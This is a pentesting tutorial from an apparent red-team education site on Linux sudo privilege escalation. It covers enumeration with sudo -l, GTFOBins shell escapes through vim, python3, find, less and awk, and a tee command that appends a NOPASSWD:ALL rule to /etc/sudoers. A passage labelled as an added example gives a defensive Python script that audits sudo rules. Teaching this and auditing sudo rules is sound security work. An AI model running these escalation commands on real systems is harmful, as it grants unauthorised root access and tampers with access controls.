Originally published on Securityelites - AI Red Team Education, the canonical, fully updated version of this article.
I find a sudo misconfiguration on at least half of the Linux systems I assess. Not because organisations are careless: most have intentional sudo rules for legitimate operational reasons. The problem is that those rules were written by someone who understood the intended use case but didn't know about GTFOBins. Every sudo rule that lets a user run a binary capable of spawning a shell, reading arbitrary files, or writing to privileged paths is a potential privilege escalation path. Here are the seven methods I use in practice, in order of how often I find them.
What You'll Learn
Enumerate sudo permissions with sudo -l and understand the output
Exploit NOPASSWD sudo rules via GTFOBins techniques
Abuse LD_PRELOAD and env_keep for privilege escalation
Exploit wildcard injection in sudo rules
Check for vulnerable sudo versions (CVE-2021-3156 Sudo Baron Samedit)
30 min read · 3 exercises

### 7 Linux Sudo Privilege Escalation Methods

Table of Contents
1. Enumeration - sudo -l and /etc/sudoers
2. NOPASSWD - Shell Escape via GTFOBins
3. LD_PRELOAD - Environment Variable Abuse
4. sudo Version Exploits - Baron Samedit
5. Wildcard Injection in sudo Rules
6. env_keep - Inherited Variable Abuse
7. Restricted Shell Bypass via Allowed Binaries

Sudo privilege escalation is one of the first checks I run on every internal Linux assessment, right after confirming I have a shell. It is one of the core paths in the Privilege Escalation methodology. After you've run port scanning to confirm the service footprint, sudo enumeration is the first check I run after landing a low-privilege shell. My rule: sudo -l before anything else, every single time, without exception.
1. Enumeration - sudo -l and /etc/sudoers
Every privilege escalation attempt starts with enumeration. sudo -l lists what the current user can run with sudo; no password is required for this check in most configurations. The output tells you everything about the attack surface before you need to research anything on GTFOBins.
SUDO ENUMERATION COMMANDS

```bash
# Most important command on initial shell
sudo -l

# Sample output:
# User www-data may run the following commands on target:
#     (root) NOPASSWD: /usr/bin/vim
#     (root) NOPASSWD: /usr/bin/python3 /opt/scripts/backup.py
#     (ALL : ALL) ALL

# Read /etc/sudoers if permissions allow (rare)
cat /etc/sudoers 2>/dev/null
cat /etc/sudoers.d/* 2>/dev/null
```
Interpreting the output
- (root) NOPASSWD: /bin/vim : run vim as root, no password = GTFOBins target
- (ALL) ALL : run ANYTHING as root = game over
- (root) /usr/bin/python3 *.py : wildcard = injection possible
- (root) /usr/bin/find : GTFOBins: find -exec /bin/sh \;
2. NOPASSWD - Shell Escape via GTFOBins
GTFOBins (gtfobins.github.io) catalogs shell escape techniques for hundreds of Linux binaries. When sudo -l shows a binary with NOPASSWD, I check GTFOBins for that binary immediately. Common binaries allowed in sudo rules that have trivial shell escape techniques: vim, nano, less, man, find, python, perl, ruby, awk, nmap, tee, cp.
NOPASSWD GTFOBins - TOP TECHNIQUES

```bash
# vim - escape to shell from vim
sudo vim -c ':!/bin/bash'
# OR from inside vim:
#   :set shell=/bin/bash
#   :shell

# python3 - one-liner to root shell
sudo python3 -c 'import pty; pty.spawn("/bin/bash")'

# find - exec shell via find
sudo find / -name '*.conf' -exec /bin/bash \; -quit

# less / man - shell from pager
sudo less /etc/passwd
# Then type: !/bin/bash

# awk
sudo awk 'BEGIN {system("/bin/bash")}'

# tee - write to privileged files
echo 'www-data ALL=(ALL) NOPASSWD:ALL' | sudo tee -a /etc/sudoers

# nmap (older versions with --interactive)
sudo nmap --interactive
# nmap> !sh
```
EXERCISE 1 - BROWSER (15 MIN)
GTFOBins Research - Map 10 Binaries to Their Sudo Escape
Browser only · gtfobins.github.io
Visit gtfobins.github.io and find the sudo escalation technique for each:
1. tar
2. zip
3. perl
4. ruby
5. node (Node.js)
6. curl
7. wget
8. bash
9. env
10. git

For each binary record:
- The exact sudo command that gives a root shell
- Whether it requires any file to exist or a particular parameter
Which 3 of these 10 would you most expect to find in a real sudo rule? (Think: what legitimate admin task would require this binary with sudo?)
Bonus: search for "cp" and "mv". Why are these dangerous in sudo rules?
Answer: the three most common in real environments (based on my assessments) are python/python3 (admins grant it for script management), find (for file search operations with elevated permissions), and less/more/man (for viewing log files without granting full read access). The "cp" and "mv" danger: with sudo cp, you can overwrite /etc/sudoers or /etc/passwd with a version you control. No shell escape is needed, just a privilege-escalating file copy.
3. LD_PRELOAD - Environment Variable Abuse
When sudo is configured with env_keep+=LD_PRELOAD, the LD_PRELOAD environment variable is preserved when running sudo commands. LD_PRELOAD forces a shared library to load before any other, including libc. If that library is attacker-controlled, any sudo invocation loads and executes the malicious library code as root.
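As an added example (not code from the original article), a small audit helper that applies the interpretation rules from method 1 to captured sudo -l output: it flags (ALL) ALL, wildcards, NOPASSWD rules for the shell-capable binaries the article names in method 2, and a Defaults entry whose env_keep preserves LD_PRELOAD as described in method 3. The constructed sample output, the set of watched binaries, and LD_LIBRARY_PATH as a second watched variable are assumptions of the example.

```python
import re

# Binaries this article names as common sudo-rule entries with trivial GTFOBins escapes (method 2).
SHELL_CAPABLE = {"vim", "nano", "less", "more", "man", "find", "python",
                 "python3", "perl", "ruby", "awk", "nmap", "tee", "cp", "mv"}
# Variables that, when kept by env_keep, let the caller choose what the root process loads (method 3).
DANGEROUS_ENV = ("LD_PRELOAD", "LD_LIBRARY_PATH")
# "(runas) TAG: cmd, cmd" as printed by sudo -l; tags such as NOPASSWD are optional.
RULE_RE = re.compile(r"^\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")

def audit_sudo_l(output: str) -> list:
    """Return one finding per risky entry in captured `sudo -l` output."""
    findings, in_defaults = [], False
    for raw in output.splitlines():
        line = raw.strip()
        if line.startswith(("Matching Defaults entries", "User ")):
            in_defaults = line.startswith("Matching")  # section header switches mode
            continue
        if in_defaults:  # Defaults section: look for preserved loader variables
            findings += [f"env_keep preserves {v}: caller controls libraries loaded as root"
                         for v in DANGEROUS_ENV if re.search(rf"env_keep\s*\+?=.*\b{v}\b", line)]
            continue
        if not (m := RULE_RE.match(line)):
            continue
        nopasswd = " (NOPASSWD)" if "NOPASSWD" in m.group("tags") else ""
        for cmd in (c.strip() for c in m.group("cmds").split(",")):
            if cmd == "ALL":
                findings.append(f"({m.group('runas')}) ALL: unrestricted root")
                continue
            prog = cmd.split()[0].rsplit("/", 1)[-1]  # basename of the allowed binary
            if "*" in cmd:
                findings.append(f"{cmd}: wildcard allows argument or path injection{nopasswd}")
            if prog in SHELL_CAPABLE:
                findings.append(f"{cmd}: {prog} is a GTFOBins shell-escape candidate{nopasswd}")
    return findings

# Constructed sample modelled on this article's sudo -l output, plus a Defaults section for the env_keep check.
SAMPLE = """\
Matching Defaults entries for www-data on target:
    env_reset, env_keep+=LD_PRELOAD, mail_badpass
User www-data may run the following commands on target:
    (root) NOPASSWD: /usr/bin/vim
    (root) NOPASSWD: /usr/bin/python3 /opt/scripts/backup.py
    (root) /usr/bin/python3 /opt/scripts/*.py
    (ALL : ALL) ALL
"""

if __name__ == "__main__":
    for finding in audit_sudo_l(SAMPLE):
        print("[!]", finding)
```

Feed it the saved output of sudo -l from each host in a review and every finding maps back to one of the methods above; a clean sudoers that grants only non-interactive binaries without wildcards or preserved loader variables produces no findings.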
The article continues on Securityelites - AI Red Team Education with the remaining methods, code samples, and an interactive lab walk-through.